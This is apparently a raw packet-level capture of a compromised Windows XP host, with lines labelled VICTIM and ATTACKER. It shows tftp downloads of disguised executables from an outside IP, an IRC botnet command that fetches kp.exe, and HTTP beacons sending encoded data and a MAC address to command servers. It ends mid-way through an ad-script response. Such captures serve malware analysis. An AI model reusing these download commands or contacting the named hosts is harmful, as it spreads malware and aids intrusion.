VICTIM: Microsoft Windows XP [Version 5.1.2600]
VICTIM: (C) Copyright 1985-2001 Microsoft Corp.C:\\WINDOWS\\system32>
VICTIM: dir wins\\dllhost.exe
VICTIM: Volume in drive C has no label. Volume Serial Number is 3CF1-1DE8 Directory of C:\\WINDOWS\\system32\\winsFile Not FoundC:\\WINDOWS\\system32>
VICTIM: dir dllcache\\tftpd.exe
VICTIM: Volume in drive C has no label. Volume Serial Number is 3CF1-1DE8 Directory of C:\\WINDOWS\\system32\\dllcacheFile Not FoundC:\\WINDOWS\\system32>
VICTIM: tftp -i 70.167.233.120 get svchost.exe wins\\SVCHOST.EXE
VICTIM: \000\001svchost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: \000\004\000)
VICTIM: \000\004\000*
VICTIM: \000\004\000+
VICTIM: \000\004\000,
VICTIM: \000\004\000-
VICTIM: \000\004\000.
VICTIM: \000\004\000/
VICTIM: \000\004\0000
VICTIM: \000\004\0001
VICTIM: \000\004\0002
VICTIM: \000\004\0003
VICTIM: \000\004\0004
VICTIM: \000\004\0005
VICTIM: \000\004\0006
VICTIM: \000\004\0007
VICTIM: \000\004\0008
VICTIM: \000\004\0009
VICTIM: \000\004\000:
VICTIM: Transfer successful: 29456 bytes in 5 seconds, 5891 bytes/s
VICTIM: C:\\WINDOWS\\system32>
VICTIM: \000\001dllhost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: tftp -i 70.167.233.120 get dllhost.exe wins\\DLLHOST.EXE
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: Transfer successful: 19968 bytes in 4 seconds, 4992 bytes/s
VICTIM: C:\\WINDOWS\\system32>
VICTIM: wins\\DLLHOST.EXE
VICTIM: NICK yhgmpnhxUSER f020501 . . :-
VICTIM: JOIN &virtu
ATTACKER: :u. PRIVMSG yhgmpnhx :!get http:/shabi.coolnuff.com:2012/p/out/kp.exe
VICTIM: GET /p/out/kp.exe HTTP/1.0User-Agent: DownloadHost: shabi.coolnuff.com:2012Pragma: no-cache
ATTACKER: GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B1669C2DCEECA9E5FF8F6D1DFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5FF432C&v=2&t=9.782046E-02 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /myck.jpg?t=0.2562677 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: ru.coolnuff.com:2011Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /sn.php?c=E1FFF3175ECE28B7DAC1042F74324F8A6DA67244F7D79D03380830799F493F19C7966C87714C752B650F157833233AD131C79B72235227077411F68BE89095083163E94EC91A029DFEC488F21DF3B56A13E4F8C5037DA5A3A103761B53B0981064359A87D4CF88137CCFDD5AAFAF4AD0798E597623647156B5ECD1BE7BCD71CFE6EFF15B3D0F00C7F3C6D780A561C2BE&t=0.5794947 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /sn.php?c=584650B403930897D1CA5A71C6805E9B2FE45E689DBD68F69FAFA7EE3EE8587E99C898730A375608B8D23558889822C9C93FE40D1160FADA21447508CDB5BE23346661C6DD0E52CD645E4F35DA34449B17E0DDE07F01AFA90CAE9CF1A2415FD7EFBE5C41697235AE2B98AB3DBA43CD45FF0A98C6F3A05F6DD4C0BCC9DC7EE319CEDE7CD6D9ED79C6A19488D065A50787A67D&t=0.414715 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /ck3.jpg?t=0.1766168 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: ru.coolnuff.com:2011Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /p6.asp?MAC=00-0C-29-0E-2C-21&Publicer=100 HTTP/1.0User-Agent: CA 0.0.0.2Host: myck.nucleardiscover.com:88
ATTACKER: GET /sn.php?c=26385EBA0393D971F813ECB28DF5E62416890365302E79E12346CCBF4CE20A51074E9B8EAB94C29E94FE0C7E4F4334DF699251BB6FF0486A1723CAB7BCCB77E983FCD67EE83B3EA18BB1EA906987CC13ED1AE0DD7B05FEF864C691FC64878E061342A5B8FBE0871C2794AA2D6B6BFD67B94E644B3572FADDF1A8640B74C2BB05717DDC7565541DA2F1C8B2E226E1&t=0.6061823 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /sn.php?c=AAB4E60258C88129BB505D033B43438175EA6F09819F3BA3690C3D4E59F732694F066F7A5966B0EC9BF1780AB7BB658E50AB1CF6BB24C7E5192D304D7403FD6396E9A20AAB78FC63F4CEB9C315FBF02FC0379DA0CCB2DDDBFD5F197400E3860E7425A0BDEAF18E154BF88E1802FBDD55D92CB1EF72214577B9AD087DCA68659F1D0DCA60F5C3CE0B6556AAFA6CAF65E7F12C&t=0.7630426 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /p6.asp?MAC=00-0C-29-0E-2C-21&Publicer=100 HTTP/1.0User-Agent: CA 0.0.0.2Host: ck3.nucleardiscover.com:88
ATTACKER: GET / HTTP/1.0Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: insuranceenquire.comConnection: Keep-Alive
ATTACKER: GET /?o_id=62461&domainname=insuranceenquire.com HTTP/1.0Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: searchportal.information.comConnection: Keep-Alive
ATTACKER: GET /apps/domainpark/show_afd_ads.js HTTP/1.0Accept: */*Referer: http:/searchportal.information.com/?o_id=62461&domainname=insuranceenquire.comUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: pagead2.googlesyndication.comConnection: Keep-Alive
ATTACKER: HTTP/1.0 200 OKLast-Modified: Thu, 04 Aug 2011 18:35:44 GMTContent-Type: text/javascript; charset=UTF-8Date: Tue, 09 Aug 2011 21:15:37 GMTExpires: Wed, 10 Aug 2011 21:15:37 GMTX-Content-Type-Options: nosniffContent-Disposition: attachmentServer: domainserverAge: 10554Cache-Control: public, max-age=86400(function(){var f=null,h=function(a){var b=typeof a;if(b==\object\)if(a){if(a instanceof Array)return\array\;else if(a instanceof Object)return b;var c=Object.prototype.toString.call(a);if(c==\[object Window]\)return\object\;if(c==\[object Array]\||typeof a.length==umber\&&typeof a.splice!=\undefined\&&typeof a.propertyIsEnumerable!=\undefined\&&!a.propertyIsEnumerable(\splice\))return\array\;if(c==\[object Function]\||typeof a.call!=\undefined\&&typeof a.propertyIsEnumerable!=\undefined\&&!a.propertyIsEnumerable(\call\))return\function\}else returnull\;else if(b==\function\&&typeof a.call==\undefined\)return\object\;return b};function i(a,b,c){c!=f&&c!==\\&&(a+=encodeURIComponent(b)+\=\+encodeURIComponent(c)+\&\);return a}function _google_json_callback(a){j();var b=\google_afd_ad_request_done\;if(window[b])window[b](a)}function k(a,b){var c=document;window._google_json_callback=_google_json_callback;if(b){var d=c.createElement(\script\);d.src=a;d.async=!0;c=c.getElementsByTagName(\script\)[0];c.parentNode.insertBefore(d,c)}else c.write('